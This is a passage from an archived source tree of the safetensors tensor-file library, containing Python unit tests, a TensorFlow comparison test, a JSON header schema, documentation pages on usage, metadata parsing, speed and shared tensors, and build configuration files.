b'\x80\x00\x00\x00\x00\x00\x00\x00{"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]},"test2":{"dtype":"F16","shape":[2,2],"data_offsets":[16,24]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) self.assertEqual(out1[8:].index(b"\x00") + 8, 136) self.assertEqual((out1[8:].index(b"\x00") + 8) % 8, 0) def test_serialization_metadata(self): data = np.zeros((2, 2), dtype=np.int32) out1 = save({"test1": data}, metadata={"framework": "pt"}) self.assertEqual( out1, b'`\x00\x00\x00\x00\x00\x00\x00{"__metadata__":{"framework":"pt"},"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) self.assertEqual(out1[8:].index(b"\x00") + 8, 104) self.assertEqual((out1[8:].index(b"\x00") + 8) % 8, 0) def test_serialization_no_big_endian(self): # Big endian tensor data = np.zeros((2, 2), dtype=">i4") out1 = save({"test1": data}, metadata={"framework": "pt"}) self.assertEqual( out1, b'`\x00\x00\x00\x00\x00\x00\x00{"__metadata__":{"framework":"pt"},"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) self.assertEqual(out1[8:].index(b"\x00") + 8, 104) self.assertEqual((out1[8:].index(b"\x00") + 8) % 8, 0) def test_accept_path(self): tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8), } save_file_pt(tensors, Path("./out.safetensors")) load_file_pt(Path("./out.safetensors")) os.remove(Path("./out.safetensors")) def test_pt_sf_save_model_overlapping_storage(self): m = torch.randn(10) n = torch.empty([], dtype=m.dtype, device=m.device) element_size = torch.finfo(m.dtype).bits // 8 try: smaller_storage = m.untyped_storage()[: 4 * element_size] except Exception: try: # Fallback for torch>=1.13 smaller_storage = m.storage().untyped()[: 4 * element_size] except Exception: try: # Fallback for torch>=1.11 smaller_storage = m.storage()._untyped()[: 4 * element_size] except Exception: # Fallback for torch==1.10 smaller_storage = m.storage()[:4] n.set_(source=smaller_storage) # Check that we can have tensors with storage that have the same `data_ptr` but not the same storage size self.assertEqual(storage_ptr(n), storage_ptr(m)) self.assertNotEqual(storage_size(n), storage_size(m)) self.assertEqual(storage_size(n), 4 * element_size) self.assertEqual(storage_size(m), 10 * element_size) shared_tensors = _find_shared_tensors({"m": m, "n": n}) self.assertEqual(shared_tensors, [{"m"}, {"n"}]) class WindowsTestCase(unittest.TestCase): def test_get_correctly_dropped(self): tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8), } save_file_pt(tensors, "./out.safetensors") with safe_open("./out.safetensors", framework="pt") as f: pass with self.assertRaises(SafetensorError): print(f.keys()) with open("./out.safetensors", "w") as g: g.write("something") class ErrorsTestCase(unittest.TestCase): def test_file_not_found(self): with self.assertRaises(FileNotFoundError) as ctx: with safe_open("notafile", framework="pt"): pass self.assertEqual(str(ctx.exception), 'No such file or directory: "notafile"') class ReadmeTestCase(unittest.TestCase): def assertTensorEqual(self, tensors1, tensors2, equality_fn): self.assertEqual(tensors1.keys(), tensors2.keys(), "tensor keys don't match") for k, v1 in tensors1.items(): v2 = tensors2[k] self.assertTrue(equality_fn(v1, v2), f"{k} tensors are different") def test_numpy_example(self): tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} save_file(tensors, "./out.safetensors") out = save(tensors) # Now loading loaded = load_file("./out.safetensors") self.assertTensorEqual(tensors, loaded, np.allclose) loaded = load(out) self.assertTensorEqual(tensors, loaded, np.allclose) def test_numpy_bool(self): tensors = {"a": np.asarray(False)} save_file(tensors, "./out_bool.safetensors") out = save(tensors) # Now loading loaded = load_file("./out_bool.safetensors") self.assertTensorEqual(tensors, loaded, np.allclose) loaded = load(out) self.assertTensorEqual(tensors, loaded, np.allclose) def test_torch_example(self): tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8), } # Saving modifies the tensors to type numpy, so we must copy for the # test to be correct. tensors2 = tensors.copy() save_file_pt(tensors, "./out.safetensors") # Now loading loaded = load_file_pt("./out.safetensors") self.assertTensorEqual(tensors2, loaded, torch.allclose) def test_exception(self): flattened = {"test": {"dtype": "float32", "shape": [1]}} with self.assertRaises(SafetensorError): serialize(flattened) def test_torch_slice(self): A = torch.randn((10, 5)) tensors = { "a": A, } save_file_pt(tensors, "./slice.safetensors") # Now loading with safe_open("./slice.safetensors", framework="pt", device="cpu") as f: slice_ = f.get_slice("a") tensor = slice_[:] self.assertEqual(list(tensor.shape), [10, 5]) torch.testing.assert_close(tensor, A) tensor = slice_[tuple()] self.assertEqual(list(tensor.shape), [10, 5]) torch.testing.assert_close(tensor, A) tensor = slice_[:2] self.assertEqual(list(tensor.shape), [2, 5]) torch.testing.assert_close(tensor, A[:2]) tensor = slice_[:, :2] self.assertEqual(list(tensor.shape), [10, 2]) torch.testing.assert_close(tensor, A[:, :2]) tensor = slice_[0, :2] self.assertEqual(list(tensor.shape), [2]) torch.testing.assert_close(tensor, A[0, :2]) tensor = slice_[2:, 0] self.assertEqual(list(tensor.shape), [8]) torch.testing.assert_close(tensor, A[2:, 0]) tensor = slice_[2:, 1] self.assertEqual(list(tensor.shape), [8]) torch.testing.assert_close(tensor, A[2:, 1]) tensor = slice_[2:, -1] self.assertEqual(list(tensor.shape), [8]) torch.testing.assert_close(tensor, A[2:, -1]) tensor = slice_[list()] self.assertEqual(list(tensor.shape), [0, 5]) torch.testing.assert_close(tensor, A[list()]) def test_numpy_slice(self): A = np.random.rand(10, 5) tensors = { "a": A, } save_file(tensors, "./slice.safetensors") # Now loading with safe_open("./slice.safetensors", framework="np", device="cpu") as f: slice_ = f.get_slice("a") tensor = slice_[:] self.assertEqual(list(tensor.shape), [10, 5]) self.assertTrue(np.allclose(tensor, A)) tensor = slice_[tuple()] self.assertEqual(list(tensor.shape), [10, 5]) self.assertTrue(np.allclose(tensor, A)) tensor = slice_[:2] self.assertEqual(list(tensor.shape), [2, 5]) self.assertTrue(np.allclose(tensor, A[:2])) tensor = slice_[:, :2] self.assertEqual(list(tensor.shape), [10, 2]) self.assertTrue(np.allclose(tensor, A[:, :2])) tensor = slice_[0, :2] self.assertEqual(list(tensor.shape), [2]) self.assertTrue(np.allclose(tensor, A[0, :2])) tensor = slice_[2:, 0] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, 0])) tensor = slice_[2:, 1] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, 1])) tensor = slice_[2:, -1] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, -1])) tensor = slice_[2:, -5] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, -5])) tensor = slice_[list()] self.assertEqual(list(tensor.shape), [0, 5]) self.assertTrue(np.allclose(tensor, A[list()])) with self.assertRaises(SafetensorError) as cm: tensor = slice_[2:, -6] self.assertEqual(str(cm.exception), "Invalid index -6 for dimension 1 of size 5") with self.assertRaises(SafetensorError) as cm: tensor = slice_[[0, 1]] self.assertEqual(str(cm.exception), "Non empty lists are not implemented") with self.assertRaises(SafetensorError) as cm: tensor = slice_[2:, 20] self.assertEqual( str(cm.exception), "Error during slicing [2:20] with shape [10, 5]: SliceOutOfRange { dim_index: 1, asked: 20, dim_size: 5 }", ) safetensors-0.5.2/bindings/python/tests/test_tf_comparison.py000066400000000000000000000054411473753372300246300ustar00rootroot00000000000000import unittest import h5py import numpy as np import tensorflow as tf from safetensors import safe_open from safetensors.tensorflow import load_file, save_file def _load(f, tensors=None, prefix=""): if tensors is None: tensors = {} for k in f.keys(): if isinstance(f[k], h5py._hl.dataset.Dataset): key = k if not prefix else f"{prefix}_{k}" tensors[key] = tf.convert_to_tensor(np.array(f[k])) else: tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) return tensors def _save(f, tensors, prefix=""): for name, tensor in tensors.items(): tensor = tensor.numpy() dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) dset[:] = tensor class SafeTestCase(unittest.TestCase): def setUp(self): data = { "test": tf.zeros((1024, 1024), dtype=tf.float32), "test2": tf.zeros((1024, 1024), dtype=tf.float32), "test3": tf.zeros((1024, 1024), dtype=tf.float32), } self.tf_filename = "./tests/data/tf_load.h5" self.sf_filename = "./tests/data/tf_load.safetensors" with h5py.File(self.tf_filename, "w") as f: _save(f, data) save_file(data, self.sf_filename) def test_zero_sized(self): data = { "test": tf.zeros((2, 0), dtype=tf.float32), } local = "./tests/data/out_safe_flat_mmap_small2.safetensors" save_file(data.copy(), local) reloaded = load_file(local) # Empty tensor != empty tensor on numpy, so comparing shapes # instead self.assertEqual(data["test"].shape, reloaded["test"].shape) def test_deserialization_safe(self): weights = load_file(self.sf_filename) with h5py.File(self.tf_filename, "r") as f: tf_weights = _load(f) for k, v in weights.items(): tv = tf_weights[k] self.assertTrue(np.allclose(v, tv)) def test_bfloat16(self): data = { "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16), } save_file(data, self.sf_filename) weights = {} with safe_open(self.sf_filename, framework="tf") as f: for k in f.keys(): weights[k] = f.get_tensor(k) for k, v in weights.items(): tv = data[k] self.assertTrue(tf.experimental.numpy.allclose(v, tv)) def test_deserialization_safe_open(self): weights = {} with safe_open(self.sf_filename, framework="tf") as f: for k in f.keys(): weights[k] = f.get_tensor(k) with h5py.File(self.tf_filename, "r") as f: tf_weights = _load(f) for k, v in weights.items(): tv = tf_weights[k] self.assertTrue(np.allclose(v, tv)) safetensors-0.5.2/codecov.yaml000066400000000000000000000000171473753372300163740ustar00rootroot00000000000000comment: false safetensors-0.5.2/codecov.yml000066400000000000000000000000171473753372300162330ustar00rootroot00000000000000comment: false safetensors-0.5.2/docs/000077500000000000000000000000001473753372300150205ustar00rootroot00000000000000safetensors-0.5.2/docs/safetensors.schema.json000066400000000000000000000031471473753372300215130ustar00rootroot00000000000000{ "$schema": "https://json-schema.org/draft/2020-12/schema", "title": "safetensors format header", "description": "Describes the structure of all the tensors and their metadata", "$defs": { "size_t": { "type": "integer", "minimum": 0, "maximum": 281474976710655, "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)" }, "Tensor": { "title": "Tensor", "description": "Describes the structure of one tensor", "type": "object", "additionalProperties": false, "properties": { "dtype": { "type": "string", "pattern": "([UIF])(8|16|32|64|128|256)", "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits." }, "shape": { "type": "array", "items": { "$ref": "#/$defs/size_t", "description": "Size of each dimension." } }, "data_offsets": { "type": "array", "prefixItems": [ { "$ref": "#/$defs/size_t", "description": "Start offset of the array. " }, { "$ref": "#/$defs/size_t", "description": "End offset of the array. Equal to the previous item + array size." } ] } }, "required": [ "data_offsets", "dtype", "shape" ] }, "Metadata": { "type": "object", "additionalProperties": {"type": "string"}, "title": "Metadata" } }, "type": "object", "properties": { "__metadata__": { "description": "Arbitrary metadata", "$ref": "#/$defs/Metadata" } }, "additionalProperties": { "$ref": "#/$defs/Tensor" } } safetensors-0.5.2/docs/source/000077500000000000000000000000001473753372300163205ustar00rootroot00000000000000safetensors-0.5.2/docs/source/_toctree.yml000066400000000000000000000010761473753372300206530ustar00rootroot00000000000000- sections: - local: index title: 🤗 Safetensors - local: speed title: Speed Comparison - local: torch_shared_tensors title: Tensor Sharing in Pytorch - local: metadata_parsing title: Metadata Parsing - local: convert-weights title: Convert weights to safetensors title: Getting started - sections: - local: api/torch title: Torch API - local: api/tensorflow title: Tensorflow API - local: api/paddle title: PaddlePaddle API - local: api/flax title: Flax API - local: api/numpy title: Numpy API title: API safetensors-0.5.2/docs/source/api/000077500000000000000000000000001473753372300170715ustar00rootroot00000000000000safetensors-0.5.2/docs/source/api/flax.mdx000066400000000000000000000002361473753372300205360ustar00rootroot00000000000000# Flax API [[autodoc]] safetensors.flax.load_file [[autodoc]] safetensors.flax.load [[autodoc]] safetensors.flax.save_file [[autodoc]] safetensors.flax.save safetensors-0.5.2/docs/source/api/numpy.mdx000066400000000000000000000002431473753372300207520ustar00rootroot00000000000000# Numpy API [[autodoc]] safetensors.numpy.load_file [[autodoc]] safetensors.numpy.load [[autodoc]] safetensors.numpy.save_file [[autodoc]] safetensors.numpy.save safetensors-0.5.2/docs/source/api/paddle.mdx000066400000000000000000000002561473753372300210370ustar00rootroot00000000000000# PaddlePaddle API [[autodoc]] safetensors.paddle.load_file [[autodoc]] safetensors.paddle.load [[autodoc]] safetensors.paddle.save_file [[autodoc]] safetensors.paddle.save safetensors-0.5.2/docs/source/api/tensorflow.mdx000066400000000000000000000002741473753372300220100ustar00rootroot00000000000000# Tensorflow API [[autodoc]] safetensors.tensorflow.load_file [[autodoc]] safetensors.tensorflow.load [[autodoc]] safetensors.tensorflow.save_file [[autodoc]] safetensors.tensorflow.save safetensors-0.5.2/docs/source/api/torch.mdx000066400000000000000000000003651473753372300207260ustar00rootroot00000000000000# Torch API [[autodoc]] safetensors.torch.load_file [[autodoc]] safetensors.torch.load [[autodoc]] safetensors.torch.save_file [[autodoc]] safetensors.torch.save [[autodoc]] safetensors.torch.load_model [[autodoc]] safetensors.torch.save_model safetensors-0.5.2/docs/source/convert-weights.md000066400000000000000000000021041473753372300217670ustar00rootroot00000000000000# Convert weights to safetensors PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`. The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository. For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights. Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space. safetensors-0.5.2/docs/source/index.mdx000066400000000000000000000067351473753372300201540ustar00rootroot00000000000000
# Safetensors Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed). ## Installation with pip: ``` pip install safetensors ``` with conda: ``` conda install -c huggingface safetensors ``` ## Usage ### Load tensors ```python from safetensors import safe_open tensors = {} with safe_open("model.safetensors", framework="pt", device=0) as f: for k in f.keys(): tensors[k] = f.get_tensor(k) ``` Loading only part of the tensors (interesting when running on multiple GPU) ```python from safetensors import safe_open tensors = {} with safe_open("model.safetensors", framework="pt", device=0) as f: tensor_slice = f.get_slice("embedding") vocab_size, hidden_dim = tensor_slice.get_shape() tensor = tensor_slice[:, :hidden_dim] ``` ### Save tensors ```python import torch from safetensors.torch import save_file tensors = { "embedding": torch.zeros((2, 2)), "attention": torch.zeros((2, 3)) } save_file(tensors, "model.safetensors") ``` ## Format Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format:
## Featured Projects Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors: * [huggingface/transformers](https://github.com/huggingface/transformers) * [ml-explore/mlx](https://github.com/ml-explore/mlx) * [huggingface/candle](https://github.com/huggingface/candle) * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537) * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix) * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI) * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models) * [CivitAI](https://civitai.com/) * [huggingface/diffusers](https://github.com/huggingface/diffusers) * [coreylowman/dfdx](https://github.com/coreylowman/dfdx) * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI) * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui) * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner) * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP) * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT) * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry) * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI) * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE) * [alvarobartt/safejax](https://github.com/alvarobartt/safejax) * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic) safetensors-0.5.2/docs/source/metadata_parsing.mdx000066400000000000000000000171471473753372300223470ustar00rootroot00000000000000# Metadata Parsing Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests). This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language. ## Example use case There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
## Usage From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In this example python script below (you can use any language that has HTTP requests support), we are parsing metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors). ```python import requests # pip install requests import struct def parse_single_file(url): # Fetch the first 8 bytes of the file headers = {'Range': 'bytes=0-7'} response = requests.get(url, headers=headers) # Interpret the bytes as a little-endian unsigned 64-bit integer length_of_header = struct.unpack(' Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js) ```ts import { parseSafetensorsMetadata } from "@huggingface/hub"; const info = await parseSafetensorsMetadata({ repo: { type: "model", name: "bigscience/bloom" }, }); console.log(info) // { // sharded: true, // index: { // metadata: { total_size: 352494542848 }, // weight_map: { // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors', // ... // } // }, // headers: { // __metadata__: {'format': 'pt'}, // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]}, // ... // } // } ``` Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be: ```ts export type SafetensorsParseFromRepo = | { sharded: false; header: SafetensorsFileHeader; } | { sharded: true; index: SafetensorsIndexJson; headers: SafetensorsShardedHeaders; }; ``` where the underlying `types` are the following: ```ts type FileName = string; type TensorName = string; type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL"; interface TensorInfo { dtype: Dtype; shape: number[]; data_offsets: [number, number]; } type SafetensorsFileHeader = Record & { __metadata__: Record; }; interface SafetensorsIndexJson { weight_map: Record; } export type SafetensorsShardedHeaders = Record; ``` [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata. Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model. Depending on if the model is sharded or not, one or multiple safetensors files will be parsed. ```python >>> from huggingface_hub import get_safetensors_metadata # Parse repo with single weights file >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m") >>> metadata SafetensorsRepoMetadata( metadata=None, sharded=False, weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...}, files_metadata={'model.safetensors': SafetensorsFileMetadata(...)} ) >>> metadata.files_metadata["model.safetensors"].metadata {'format': 'pt'} # Parse repo with sharded model (i.e. multiple weights files) >>> metadata = get_safetensors_metadata("bigscience/bloom") Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s] >>> metadata SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...}) >>> len(metadata.files_metadata) 72 # All safetensors files have been fetched # Parse repo that is not a safetensors repo >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5") NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files. ``` To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata). ## Example output For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage. model | safetensors | params --- | --- | --- [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 } [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 } [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 } [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 } [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 } [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 } [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 } [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 } [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 } safetensors-0.5.2/docs/source/speed.mdx000066400000000000000000000065661473753372300201470ustar00rootroot00000000000000# Speed Comparison Open In Colab `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab. Before you begin, make sure you have all the necessary libraries installed: ```bash pip install safetensors huggingface_hub torch ``` Let's start by importing all the packages that will be used: ```py >>> import os >>> import datetime >>> from huggingface_hub import hf_hub_download >>> from safetensors.torch import load_file >>> import torch ``` Download safetensors & torch weights for gpt2: ```py >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors") >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin") ``` ### CPU benchmark ```py >>> start_st = datetime.datetime.now() >>> weights = load_file(sf_filename, device="cpu") >>> load_time_st = datetime.datetime.now() - start_st >>> print(f"Loaded safetensors {load_time_st}") >>> start_pt = datetime.datetime.now() >>> weights = torch.load(pt_filename, map_location="cpu") >>> load_time_pt = datetime.datetime.now() - start_pt >>> print(f"Loaded pytorch {load_time_pt}") >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") Loaded safetensors 0:00:00.004015 Loaded pytorch 0:00:00.307460 on CPU, safetensors is faster than pytorch by: 76.6 X ``` This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282). The currently shown speedup was gotten on: * OS: Ubuntu 18.04.6 LTS * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz ### GPU benchmark ```py >>> # This is required because this feature hasn't been fully verified yet, but >>> # it's been tested on many different environments >>> os.environ["SAFETENSORS_FAST_GPU"] = "1" >>> # CUDA startup out of the measurement >>> torch.zeros((2, 2)).cuda() >>> start_st = datetime.datetime.now() >>> weights = load_file(sf_filename, device="cuda:0") >>> load_time_st = datetime.datetime.now() - start_st >>> print(f"Loaded safetensors {load_time_st}") >>> start_pt = datetime.datetime.now() >>> weights = torch.load(pt_filename, map_location="cuda:0") >>> load_time_pt = datetime.datetime.now() - start_pt >>> print(f"Loaded pytorch {load_time_pt}") >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") Loaded safetensors 0:00:00.165206 Loaded pytorch 0:00:00.353889 on GPU, safetensors is faster than pytorch by: 2.1 X ``` The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU. The currently shown speedup was gotten on: * OS: Ubuntu 18.04.6 LTS. * GPU: Tesla T4 * Driver Version: 460.32.03 * CUDA Version: 11.2 safetensors-0.5.2/docs/source/torch_shared_tensors.mdx000066400000000000000000000100661473753372300232570ustar00rootroot00000000000000# Torch shared tensors ## TL;DR Using specific functions, which should work in most cases for you. This is not without side effects. ```python from safetensors.torch import load_model, save_model save_model(model, "model.safetensors") # Instead of save_file(model.state_dict(), "model.safetensors") load_model(model, "model.safetensors") # Instead of model.load_state_dict(load_file("model.safetensors")) ``` ## What are shared tensors ? Pytorch uses shared tensors for some computation. This is extremely interesting to reduce memory usage in general. One very classic use case is in transformers the `embeddings` are shared with `lm_head`. By using the same matrix, the model uses less parameters, and gradients flow much better to the `embeddings` (which is the start of the model, so they don't flow easily there, whereas `lm_head` is at the tail of the model, so gradients are extremely good over there, since they are the same tensors, they both benefit) ```python from torch import nn class Model(nn.Module): def __init__(self): super().__init__() self.a = nn.Linear(100, 100) self.b = self.a def forward(self, x): return self.b(self.a(x)) model = Model() print(model.state_dict()) # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias']) torch.save(model.state_dict(), "model.bin") # This file is now 41k instead of ~80k, because A and B are the same weight hence only 1 is saved on disk with both `a` and `b` pointing to the same buffer ``` ## Why are shared tensors not saved in `safetensors` ? Multiple reasons for that: - *Not all frameworks support them* for instance `tensorflow` does not. So if someone saves shared tensors in torch, there is no way to load them in a similar fashion so we could not keep the same `Dict[str, Tensor]` API. - *It makes lazy loading very quickly.* Lazy loading is the ability to load only some tensors, or part of tensors for a given file. This is trivial to do without sharing tensors but with tensor sharing ```python with safe_open("model.safetensors", framework="pt") as f: a = f.get_tensor("a") b = f.get_tensor("b") ``` Now it's impossible with this given code to "reshare" buffers after the fact. Once we give the `a` tensor we have no way to give back the same memory when you ask for `b`. (In this particular example we could keep track of given buffers but this is not the case in general, since you could do arbitrary work with `a` like sending it to another device before asking for `b`) - *It can lead to much larger file than necessary*. If you are saving a shared tensor which is only a fraction of a larger tensor, then saving it with pytorch leads to saving the entire buffer instead of saving just what is needed. ```python a = torch.zeros((100, 100)) b = a[:1, :] torch.save({"b": b}, "model.bin") # File is 41k instead of the expected 400 bytes # In practice it could happen that you save several 10GB instead of 1GB. ``` Now with all those reasons being mentioned, nothing is set in stone in there. Shared tensors do not cause unsafety, or denial of service potential, so this decision could be revisited if current workarounds are not satisfactory. ## How does it work ? The design is rather simple. We're going to look for all shared tensors, then looking for all tensors covering the entire buffer (there can be multiple such tensors). That gives us multiple names which can be saved, we simply choose the first one During `load_model`, we are loading a bit like `load_state_dict` does, except we're looking into the model itself, to check for shared buffers, and ignoring the "missed keys" which were actually covered by virtue of buffer sharing (they were properly loaded since there was a buffer that loaded under the hood). Every other error is raised as-is **Caveat**: This means we're dropping some keys within the file. meaning if you're checking for the keys saved on disk, you will see some "missing tensors" or if you're using `load_state_dict`. Unless we start supporting shared tensors directly in the format there's no real way around it. safetensors-0.5.2/flake.lock000066400000000000000000000010671473753372300160300ustar00rootroot00000000000000{ "nodes": { "nixpkgs": { "locked": { "lastModified": 1730531603, "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=", "owner": "NixOS", "repo": "nixpkgs", "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d", "type": "github" }, "original": { "owner": "NixOS", "ref": "nixos-unstable", "repo": "nixpkgs", "type": "github" } }, "root": { "inputs": { "nixpkgs": "nixpkgs" } } }, "root": "root", "version": 7 } safetensors-0.5.2/flake.nix000066400000000000000000000016171473753372300156770ustar00rootroot00000000000000{ inputs = { nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; }; outputs = { nixpkgs, ... }: let forAllSystems = nixpkgs.lib.genAttrs [ "aarch64-linux" "x86_64-linux" "aarch64-darwin" ]; in { devShells = forAllSystems ( system: let pkgs = nixpkgs.legacyPackages.${system}; in { default = pkgs.mkShell { buildInputs = with pkgs; [ rustup python3Packages.python python3Packages.venvShellHook ]; venvDir = "./.venv"; postVenvCreation = '' unset SOURCE_DATE_EPOCH ''; postShellHook = '' unset SOURCE_DATE_EPOCH ''; LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib"; }; } ); }; } safetensors-0.5.2/safetensors/000077500000000000000000000000001473753372300164245ustar00rootroot00000000000000safetensors-0.5.2/safetensors/Cargo.toml000066400000000000000000000024431473753372300203570ustar00rootroot00000000000000[package] name = "safetensors" version = "0.5.2" edition = "2021" homepage = "https://github.com/huggingface/safetensors" repository = "https://github.com/huggingface/safetensors" documentation = "https://docs.rs/safetensors/" license = "Apache-2.0" keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"] readme = "./README.md" description = """ Provides functions to read and write safetensors which aim to be safer than their PyTorch counterpart. The format is 8 bytes which is an unsized int, being the size of a JSON header, the JSON header refers the `dtype` the `shape` and 